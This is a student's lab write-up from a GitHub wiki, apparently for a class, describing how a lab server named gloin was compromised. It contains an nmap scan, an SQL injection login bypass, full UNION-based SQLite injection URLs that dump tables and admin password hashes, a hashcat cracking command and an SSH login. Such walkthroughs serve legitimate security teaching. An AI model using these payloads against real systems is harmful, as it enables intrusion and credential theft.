Exploiting Gloin - Foren-Ken/tech-journal GitHub Wiki
Details
Server Name: gloin.shire.org
Server IP Address: 10.0.5.31
Nmap Scan Results
nmap --top-ports 100 -A 10.0.5.31
| Port | State | Service | Version |
|---|---|---|---|
| 22/tcp | Open | ssh | OpenSSH for_Windows_7.7 (protocol 2.0) |
| 443/tcp | Open | ssl/http | Apache httpd 2.4.51 ((Win64) OpenSSL/1.1.1l PHP/7.3.31) |
| 3389/tcp | Open | ms-wbt-server | Microsoft Terminal Services |
I was able to gain administrator access to this server by the following steps:
-
Upon visiting the page, https://10.0.5.31, I was greeted with the following page. This page was vulnerable to the following input
' or 1=1 --due to the weak sanitization.
-
After gaining access to the entrance exam page located at https://10.0.5.31/entrance_exam/, I was able to use dirb to see if any interesting directories were accessible. A very interesting directory was discovered called https://10.0.5.31/entrance_exam/admin. The following is the admin page:
-
Utilizing the same vulnerability as before, I was able to use
' or 1=1 --in the "username" section with a random password to gain access to the admin account.
-
The admin had a great deal of control over the exam set list, and these exams allowed for an argument to be submitted, I was able to write SQL queries into the URI. Utilizing the following URI, I was able to determine the amount of arguments which the SQL server expected by testing by how much the SQL server allows me to order by. The max amount I was able to archive without error is 7. I had also learned that the server is running SQLite due to the error message.
-
With this knowledge, I was researched that SQLite versions above 3.33.0 use the following syntax to show all the table's contents
select all sql from sql_master. With this, I crafted the following payload. https://10.0.5.31/entrance_exam/admin/?page=view_exam&id=-1%27%20union%20all%20select%20%221%22,sql,null,null,null,null,null%20from%20sqlite_master%20--
-
The table dump displayed two columns of interest. These would be "username" and "password". I was able to create the following query to obtain both of these: https://10.0.5.31/entrance_exam/admin/?page=view_exam&id=-1%27%20union%20all%20select%20%221%22,group_concat(username),null,null,group_concat(password),group_concat(password),group_concat(password)%20from%20admin_list%20--
-
Taking the first hash, which was for admin since admin is the first in it's list of usernames, I was able to crack it using hashcat. The command
hashcat -m 0 -a 0 "4214db3884e9cd913b49b5b44e49ae96" rockyou.txt --showwas used. The "--show" is due to me using this command in the past. -
Utilizing the cleartext password, I was able to ssh into the [email protected] account on the target server. This provided me administrator access.
Difficulties
The main issue I had encountered when initially accessing the target was not knowing the basic ' or 1=1-- trick. This caused me to go on long research sessions to discover obscure vulnerabilities. Once I had discovered it was that simple, the next issue I had faced was with utilizing the cracked password. Unlike any machine before, the account was not the name of the machine or "admin". This made me doubt that the password was correct and I went back into looking for another way. In class, I was told that the account is named "Administrator" and that was just silly since I had spent so much time looking for such a simple solution.